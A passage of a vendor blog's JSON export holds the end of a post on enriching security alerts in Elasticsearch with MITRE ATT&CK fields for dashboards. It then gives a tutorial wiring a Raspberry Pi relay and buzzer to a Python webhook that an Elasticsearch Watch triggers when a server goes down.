\"newIndex\"\n }\n }\n },\n\u003c/pre\u003e\u003cstrong\u003e\u003ch2\u003eCool, Now What?\u003c/h2\u003e\u003c/strong\u003e\u003cp\u003eNow that you’re storing and enriching alert data you’ll probably want to do something with it. This is where all the hard work of getting your alerts stored and enriched pays off. Now you have another index with data that you can report and alert on. Let’s dive in to some ways I’m using this alert data.\n\u003c/p\u003e \u003cstrong\u003e\u003ch3\u003eReporting\u003c/h3\u003e\u003c/strong\u003e\u003cp\u003eNow that we have all of our alerts populating a new index with injected fields for our monitoring environment, we can start reporting on our observations. I set up a Canvas dashboard that lets us gain insights into what we’ve observed in our environment. Here is the Canvas dashboard with some sample data so you can see it in action.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3f3226ec24d94348/5de56dda546f955ab898caf4/alerts-blog-dashboard.jpg\" data-sys-asset-uid=\"blt3f3226ec24d94348\" alt=\"Canvas dashboard showing security alerts overview\" style=\"display: block; margin: auto;\"\u003e\n\u003c/p\u003e\u003cp\u003eWith this Canvas dashboard we are showing an overview of the alerts enriched with MITRE ATT\u0026CK information. You can see the total number of alerts triggered and that is further broken down by MITRE ATT\u0026CK Technique, host, and operating system. This can start to give us insight into if an attack is targeted at a single or small number of hosts or if there is just a lot of activity happening in general. We can also see if the alerts are all for a particular operating system or not. This may result in reviewing the configuration and security posture of that OS since we can see more alerts being generated from them.\u0026nbsp;\n\u003c/p\u003e\u003cp\u003eThe Canvas dashboard also shows us a breakdown of the MITRE ATT\u0026CK Techniques by technique so we can see which techniques are being utilized and alerted on. We can also see with the Timelion element when these alerts are happening. This can show us if the attacks are spread out evenly, ramping up over time, or spiking.\n\u003c/p\u003e\u003cp\u003eEasier reporting, check. More meaningful reporting, check. Now lets make these alerts more useful for the analyst.\n\u003c/p\u003e \u003cstrong\u003e\u003ch3\u003eAlert Enrichment\u003c/h3\u003e\u003c/strong\u003e\u003cp\u003eWe already know the Elastic Stack is really fast at providing search results but we’re always looking for ways to make analysis even faster and more efficient. To speed up the analysts’ ability to investigate faster I made two of the injected fields link back to relevant information. Here is how I did that for \u003cstrong\u003ethreat.technique.id\u003c/strong\u003e in the index pattern for this index.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt71af6fb2ffbbac6a/5de56e7394bf745993ed3e7b/alerts-blog-field-format.png\" data-sys-asset-uid=\"blt71af6fb2ffbbac6a\" alt=\"\" style=\"display: block; margin: auto; width:60%;\"\u003e\n\u003c/p\u003e\u003cp\u003eI also did this for the field \u003cstrong\u003ewatcher.name\u003c/strong\u003e. This is how those fields show up in the Discover view now\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb62056c537f389f1/5de56eac92ebd8575d520078/alerts-blog-field-links.png\" data-sys-asset-uid=\"bltb62056c537f389f1\" alt=\"\" style=\"display: block; margin: auto; width:75%;\"\u003e\n\u003c/p\u003e\u003cp\u003eWhere do these links take you? The link for \u003cstrong\u003ethreat.technique.id\u003c/strong\u003e links back to the relevant MITRE ATT\u0026CK Technique page so the analyst can read through the details of the technique if they aren’t familiar with it. The link to \u003cstrong\u003ewatcher.name \u003c/strong\u003elinks back to our triage playbook for this watcher so analysts don’t have to remember where to find the relevant playbook.\u0026nbsp;\n\u003c/p\u003e \u003cstrong\u003e\u003ch2\u003eWrapping up\u003c/h2\u003e\u003c/strong\u003e\u003cp\u003eAnd just like that, we’ve stored and enriched alert payloads to make reporting and we’ve met our\u0026nbsp; goal of improving security detection capabilities. These same techniques can be used no matter your use case and I’m hopeful that you found this useful and can begin to do similar things within your environment. I encourage you to try it out yourself. And if you’re not currently using Elastic SIEM or Watcher, you can give them a whirl in a \u003ca href=\"https://www.elastic.co/products/elasticsearch/service\"\u003efree trial of the Elasticsearch Service\u003c/a\u003e. And as always, if you run into any problems, reach out on our \u003ca href=\"https://discuss.elastic.co\"\u003eDiscuss\u003c/a\u003e forums. Enjoy!\n\u003c/p\u003e","callout":[{"uid":"blt45b28b3fd05e72ad","_content_type_uid":"callout"}],"category":[{"uid":"blte5cc8450a098ce5e","_version":4,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:15.490Z","created_by":"blt3044324473ef223b70bc674c","key":"how-to","label_l10n":"How to","tags":[],"title":"How to","updated_at":"2024-05-10T13:44:25.495Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.353Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-12-02T19:48:18.445Z","created_by":"bltc048ade1fb9b182b","disclaimer":["bltf25c0738ab44ccd2"],"full_bleed_image":{"_version":2,"is_dir":false,"uid":"blt058b1062bad02446","ACL":{},"content_type":"image/jpeg","created_at":"2019-12-05T19:14:38.671Z","created_by":"bltf6ab93733e4e3a73","description":"","file_size":"181384","filename":"blog-banner-security-circuit-lock.jpg","parent_uid":null,"tags":[],"title":"blog-banner-security-circuit-lock.jpg","updated_at":"2020-11-25T19:51:48.721Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-11-25T19:51:51.607Z","user":"bltf6ab93733e4e3a73"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt058b1062bad02446/5fbeb5d43cdbef7187cea4a6/blog-banner-security-circuit-lock.jpg"},"markdown_l10n":"","publish_date":"2019-12-05T19:00:00.000Z","seo":{"seo_title_l10n":"","seo_description_l10n":"Generating alerts to an analyst is a great way to quickly respond to security events, enriching those alerts makes your analysts more efficient. Storing those enriched alerts allows you to perform trend analysis on your alerts to reveal observations you may have otherwise missed. Check out this blog to see how I did it with the Elastic Stack.","canonical_tag":""},"tags":["sam"],"thumbnail_image":{"_version":2,"is_dir":false,"uid":"bltc54356d57f676304","ACL":{},"content_type":"image/jpeg","created_at":"2019-12-05T19:14:27.154Z","created_by":"bltf6ab93733e4e3a73","description":"","file_size":"135627","filename":"blog-thumb-security-circuit-lock.jpg","parent_uid":null,"tags":[],"title":"blog-thumb-security-circuit-lock.jpg","updated_at":"2020-11-25T19:52:05.026Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-11-25T19:52:07.237Z","user":"bltf6ab93733e4e3a73"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc54356d57f676304/5fbeb5e509ed4c6f277f05b6/blog-thumb-security-circuit-lock.jpg"},"title":"Storing and enriching alerts for information security with Elasticsearch","title_l10n":"Storing and enriching alerts for information security with Elasticsearch","updated_at":"2024-10-09T18:02:43.533Z","updated_by":"blt36e890d06c5ec32c","url":"/blog/storing-and-enriching-alerts-for-information-security-with-elasticsearch","publish_details":{"time":"2024-10-09T18:03:04.915Z","user":"blt36e890d06c5ec32c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt1f1d4f5d6b4cf094","_version":8,"locale":"en-us","ACL":{},"abstract_l10n":"Learn how to use Raspberry Pi and a relay module to build a real-world alarm notification system for Elasticsearch.","author":["bltf66d5c6f7e1ebb83"],"body_l10n":"\u003cp\u003eDo you remember the last time when you saw a fire alarm or the police turning on a patrol car's flashing lights? That kind of warning light or loud sound simply notifies you that something is very important, or gives some some sense of danger, and that you must pay attention to it.\n\u003c/p\u003e\u003cp\u003e\n\tSometimes, you may also want to do a similar thing with your data, like when your server is down. That’s a big thing and you should call your admin as soon as possible to get it fixed. If your admin is nearby, you could even directly shout out to him/her.\n\u003c/p\u003e\u003cp\u003e\n\t“Aha!” you might say, let’s use Elasticsearch to monitor our infrastructure and use the alerting feature to notify our admin via email or Slack. Wow, that’s great, but it can be better. Sometimes, the admin’s mobile phone maybe needs to be charged or it’s been left on the table, or the admin may be having a conversation and they may not pay attention to the message, so how can we bring it up?\n\u003c/p\u003e\u003cp\u003e\n\tWhat if we used a real world warning light, like what we see during a fire alarm, and even add a loud sound that will be interesting and noticeable, so no one will miss it?\n\u003c/p\u003e\u003cp\u003e\n\tIn this post I will explain how to wire a Raspberry Pi with an alarm light and integrate it with the Elastic Stack to make this happen.\n\u003c/p\u003e\u003ch2 rel=\"line-height:1.38;margin-top:20pt;margin-bottom:6pt;\"\u003eIntro to Raspberry Pi\u003c/h2\u003e\u003cp\u003eRaspberry Pi is a very small, but fully featured computer on a single board. You may plug in a monitor with an HDMI cable and attach a keyboard, mouse, camera, or even speakers via USB ports. It can also connect to your network through Wi-Fi or an ethernet port.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt482c0f7f2373731b/5c98d4df67b8321d593d7fa2/raspberry-pi.jpg\" data-sys-asset-uid=\"blt482c0f7f2373731b\" alt=\"\" \"=\"\"\u003e\n\u003c/p\u003e\u003cp\u003eThe first generation of Raspberry Pi was developed in 2012, with the intention of making computer learning easy for school students. It is cheap, with the newest model, the 3B+, costing you under USD$40. You can install a Linux OS on it, use your favourite language to do programming, and all with very low power consumption.\n\u003c/p\u003e\u003cp\u003e\n\tThe most important feature that Raspberry Pi has is the row of GPIO (General-Purpose Input/Output) pins along the top edge of the board.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc9982e04982b119b/5c98d4dafc9053fa5ecd78e9/raspberry-pi-gpio.jpg\" data-sys-asset-uid=\"bltc9982e04982b119b\" alt=\"\" \"=\"\"\u003e\n\u003c/p\u003e\u003cp\u003eThe GPIO pins can be used with a variety of alternative functions, some are available on all pins, others on specific pins. This list below details the functions:\n\u003c/p\u003e\u003cul\u003e\n\t\u003cli\u003ePWM (pulse-width modulation)\n\t\u003cul\u003e\n\t\t\u003cli\u003eSoftware PWM available on all pins\u003c/li\u003e\n\t\t\u003cli\u003eHardware PWM available on GPIO12, GPIO13, GPIO18, GPIO19\u003c/li\u003e\n\t\u003c/ul\u003e\u003c/li\u003e\n\t\u003cli\u003eSPI\n\t\u003cul\u003e\n\t\t\u003cli\u003eSPI0: MOSI (GPIO10); MISO (GPIO9); SCLK (GPIO11); CE0 (GPIO8), CE1 (GPIO7)\u003c/li\u003e\n\t\u003c/ul\u003e\n\t\u003cul\u003e\n\t\t\u003cli\u003eSPI1: MOSI (GPIO20); MISO (GPIO19); SCLK (GPIO21); CE0 (GPIO18); CE1 (GPIO17); CE2 (GPIO16)\u003c/li\u003e\n\t\u003c/ul\u003e\u003c/li\u003e\n\t\u003cli\u003eI2C\n\t\u003cul\u003e\n\t\t\u003cli\u003eData: (GPIO2); Clock (GPIO3)\u003c/li\u003e\n\t\t\u003cli\u003eEEPROM Data: (GPIO0); EEPROM Clock (GPIO1)\u003c/li\u003e\n\t\u003c/ul\u003e\u003c/li\u003e\n\t\u003cli\u003eSerial\n\t\u003cul\u003e\n\t\t\u003cli\u003eTX (GPIO14); RX (GPIO15)\u003c/li\u003e\n\t\u003c/ul\u003e\u003c/li\u003e\n\u003c/ul\u003e\u003cp\u003eBasically, GPIO lets us connect to physical electronic device like alarm lights and also allows us to control these easily.\n\u003c/p\u003e\u003ch2\u003eHow it works\u003c/h2\u003e\u003cp\u003eSo how it does this all work? The idea of this blog post is to use Raspberry Pi to control a relay module and light up a warning light. There are many alarm lights available to buy and they are very simple. You plug it in, it starts to flash, you unplug it, it stops flashing. More than simple enough for us to use. But wait! They usually are powered with higher voltages, like 12 V, 36 V, or even 220 V, and the Pi can only support 5 V or 3.3 V, which means we can’t control it directly with the Pi, but with a relay we can make it happen. A relay is an electrically operated switch. It uses a very low power electromagnet to mechanically operate a switch, and that switch can be the bridge to connect the high power power supply and our warning light.\n\u003c/p\u003e\u003cp\u003e\n\tThen we will build a webhook service to send the command to the relay, tell the relay to switch on or off, and control the alarm light.\n\u003c/p\u003e\u003cp\u003e\n\tAnd finally, we will use Elasticsearch’s alerting feature to trigger the webhook when we find some interesting events in Elasticsearch.\n\u003c/p\u003e\u003cp\u003e\n\tAre you interested? If so, let’s get started!\n\u003c/p\u003e\u003ch2\u003eMaterials required\u003c/h2\u003e\u003cp\u003eSo besides the Raspberry Pi, what materials are needed?, We also need some other electronics items, all of them are available at most electronic stores. Here is the list:\n\u003c/p\u003e\u003ctable\u003e\u003ccolgroup\u003e\u003ccol width=\"235\"\u003e\u003ccol width=\"192\"\u003e\u003ccol width=\"192\"\u003e\u003c/colgroup\u003e\n\u003ctbody\u003e\n\u003ctr style=\"height:0pt\"\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003eName\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003eUnit\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003eComments\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr style=\"height:0pt\"\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp\u003eRaspberry Pi 3 model B+\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003e1\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003eYou know, for Pi\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr style=\"height:0pt\"\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003e16GB MicroSD card + reader\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003e1\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003eStorage for Raspberry Pi\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr style=\"height:0pt\"\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003e5V USB power supply + USB cable\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003e1\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003ePower for Raspberry Pi\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr style=\"height:0pt\"\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003eWarning light with 12 V\u0026nbsp;power\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003e1\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003eThe light to do the alarm\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr style=\"height:0pt\"\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003e5 V Relay module\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003e1\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003eControl the lights\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr style=\"height:0pt\"\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003eBreadboard\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003e1\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003eConnect\u0026nbsp;all the wires\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr style=\"height:0pt\"\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003eGPIO Breakout Expansion Board + Ribbon Cable\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003e1\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003eConnect breadboard and Pi\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr style=\"height:0pt\"\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003e3.3 V\u0026nbsp;Active Piezo Buzzer Module\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003e1\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003eLet’s make some noise\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr style=\"height:0pt\"\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003eFemale – Female jumper cable\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003e~5\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003eWire stuff together\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr style=\"height:0pt\"\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003eMale – Female jumper cable\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003e~5\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\t\u003ctd style=\"border-width: 1pt; border-color: rgb(0, 0, 0); padding: 5pt;\"\u003e\n\t\t\u003cp style=\"line-height:1.2;margin-top:0pt;margin-bottom:0pt;\"\u003eWire stuff together\n\t\t\u003c/p\u003e\n\t\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\u003ch2\u003eHardware setup\u003c/h2\u003e\u003cp\u003eBelow is the diagram of how to connect them together. As you can see, we are using a ribbon cable to connect the Pi and the breadboard, also make sure the GPIO breakout aligns with the breadboard.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6ec0deb9f113d3c6/5c98d4c7262c73954d53c60b/alarm-diagram.jpg\" data-sys-asset-uid=\"blt6ec0deb9f113d3c6\" alt=\"\" \"=\"\"\u003e\n\u003c/p\u003e\u003cp\u003eThe breadboard allow us to easily connect all the parts together, but you should be very careful. If you misconnect the VCC to GND, some bad things may happen (parts could get burned). The relay has two types of connection, one is for our warning light, the other side is connected to the breadboard, and there is an IO pin which should be connected to the breadboard labelled with P22. Remember that as we will be using it later.\n\u003c/p\u003e\u003cp\u003e\n\tWe also have put in a buzzer connected to the breadboard, the I/O pin is connected to P12, which has a PWM feature, and we will use it to control the sound buzzer later.\n\u003c/p\u003e\u003cp\u003e\n\tAfter some wiring up, here is what it looks like:\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3c48dc7b8ae8ad42/5c98d4d355e02a1e5a5e9b00/alarm-hardware.jpg\" data-sys-asset-uid=\"blt3c48dc7b8ae8ad42\" alt=\"\" \"=\"\"\u003e\n\u003c/p\u003e\u003ch2\u003eSoftware setup\u003c/h2\u003e\u003cp\u003eNow the hardware is ready, let’s jump to the software part. The Raspberry Pi is based on the ARM CPU architecture and supports the Linux operating system. I will not teach you how to install a OS in Pi, because you can get very detailed instructions from \u003ca href=\"https://projects.raspberrypi.org/en/projects/raspberry-pi-setting-up\"\u003eRaspberry Pi’s official site\u003c/a\u003e.\n\u003c/p\u003e\u003cp\u003eI have chosen RASPBIAN OS instead.\n\u003c/p\u003e\u003cp\u003eAnd now you should be able to use your favourite terminal tool to log into the Pi.\n\u003c/p\u003e\u003ch2\u003eControlling the Alarm with Python\u003c/h2\u003e\u003cp\u003eOK, let’s have some Python scripting fun by creating a script like this:\n\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003e#!/usr/bin/env python\nimport RPi.GPIO as GPIO\nPIN_RELAY = 22\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(PIN_RELAY, GPIO.OUT)\nGPIO.output(PIN_RELAY, GPIO.LOW)\n\u003c/pre\u003e\u003cp\u003e\u003cspan\u003e\u003c/span\u003eAt first, we imported a Python library RPi.GPIO, which is a neat Python package allowing you to operate the GPIO easily.\n\u003c/p\u003e\u003cp\u003e\n\tThen, we set which GPIO pin we are going to operate. Our relay is connected on pin 22 so we set the variable PIN_RELAY to 22. We then setup the pin to GPIO.OUT mode, which means we are going to write out some data to this pin and we set a value GPIO.LOW to this pin. GPIO.LOW is the new state value of the pin, there is the other state GPIO.HIGH which we will use to control the relay, and relay will be switched on after you set the state to GPIO.LOW. If you set it back to GPIO.HIGH, the relay will be switched off. There is also a jumper on the relay to set the default state.\n\u003c/p\u003e\u003cp\u003e\n\tNote that if you set it to GPIO.LOW before you set it to GPIO.HIGH, the relay will keep this state, which means that the alarm light keeps flashing. You can turn it off after a while, like this:\n\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003etime.sleep(2)\nGPIO.output(PIN_RELAY, GPIO.HIGH)\n\u003c/pre\u003e\u003cdiv style=\"margin-left:0pt;\"\u003e\n\u003c/div\u003e\u003cp\u003eNow let’s see how to make a sound. It is pretty similar to the relay, the only difference is the pin code, since the sound buzzer is connected to pin 12. Let’s see the code below:\n\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003ePIN_AUDIO = 12 #gpio 12\nGPIO.setup(PIN_AUDIO, GPIO.OUT)\nGPIO.output(PIN_AUDIO, GPIO.LOW)\ntime.sleep(0.5)\nGPIO.output(PIN_AUDIO, GPIO.HIGH)\n\u003c/pre\u003e\u003ch2\u003eAn alerting webhook service\u003c/h2\u003e\u003cp\u003eBuilding a webhook service is easy. We need to make sure that we call the webhook and it then calls the relay and buzzer. Let’s put it together using the code we built above, and a few extra sections:\n\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003eimport os\nimport time\nimport RPi.GPIO as GPIO\nfrom socket import *\nPIN_AUDIO = 12 #gpio 12\nPIN_RELAY = 22 #gpio 22\ndef setup():\n GPIO.setmode(GPIO.BCM) \n GPIO.setwarnings(False)\n GPIO.setup(PIN_RELAY, GPIO.OUT)\n GPIO.setup(PIN_AUDIO, GPIO.OUT)\ndef alarm():\n GPIO.output(PIN_AUDIO, GPIO.LOW)\n GPIO.output(PIN_RELAY, GPIO.LOW)\n time.sleep(2)\n GPIO.output(PIN_RELAY, GPIO.HIGH)\n GPIO.output(PIN_AUDIO, GPIO.HIGH)\ndef createServer():\n serversocket = socket(AF_INET, SOCK_STREAM)\n serversocket.bind(('0.0.0.0',9000))\n serversocket.listen(3)\n while(1):\n (clientsocket, address) = serversocket.accept()\n alarm()\n clientsocket.send(\"HTTP/1.1 200 OK\\n\"\n +\"Content-Type:application/json\\n\"\n +\"\\n\" # Important!\n + '{\"success\":true}'\n +\"\\n\")\n clientsocket.shutdown(SHUT_WR)\n clientsocket.close()\n serversocket.close()\ndef destroy():\n GPIO.output(PIN_RELAY, GPIO.HIGH)\n GPIO.output(PIN_RELAY, GPIO.HIGH)\n GPIO.cleanup() \nif __name__ == '__main__': \n setup()\n try:\n createServer()\n except KeyboardInterrupt: \n destroy()\n\u003c/pre\u003e\u003cp\u003eYay! We’ve just created a simple web server. You can start the webhook easily, just run: python web.py, it listens on port 9000, each time we access this port it will return a success message. Can’t be easier. But for our alerting usage this is enough.\n\u003c/p\u003e\u003ch2\u003eIntegrate with alerting\u003c/h2\u003e\u003cp\u003eWe have a small Elasticsearch cluster running on Pi, but it can be on Elastic Cloud or on your own hardware. We also have Heartbeat to monitor several services, and we will create a Watch in Elasticsearch to watch the Heartbeat indices, and will be using our new webhook endpoint (192.168.1.200:9000) in the alerting action. Here is the full Watch:\n\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003ePUT _xpack/watcher/watch/server_is_down\n{\n \"trigger\": {\n \"schedule\": {\n \"interval\": \"1s\"\n }\n },\n \"input\": {\n \"search\": {\n \"request\": {\n \"search_type\": \"query_then_fetch\",\n \"indices\": [\n \"heartbeat-*\"\n ],\n \"types\": [],\n \"body\": {\n \"size\": 0,\n \"query\": {\n \"bool\": {\n \"must\": [\n {\n \"range\": {\n \"@timestamp\": {\n \"gte\": \"now-3s\"\n }\n }\n },\n {\n \"match\": {\n \"monitor.status\": \"down\"\n }\n }\n ]\n }\n }\n }\n }\n }\n },\n \"condition\": {\n \"compare\": {\n \"ctx.payload.hits.total\": {\n \"gte\": 1\n }\n }\n },\n \"actions\": {\n \"alarm_webhook\": {\n \"webhook\": {\n \"scheme\": \"http\",\n \"host\": \"192.168.1.200\",\n \"port\": 9000,\n \"method\": \"post\",\n \"params\": {},\n \"headers\": {},\n \"body\": \"SOS, server is down!\"\n }\n }\n },\n \"throttle_period_in_millis\": 5000\n}\n\u003c/pre\u003e\u003cp\u003eAs you can see the request above, the Watch will check the Heartbeat index every 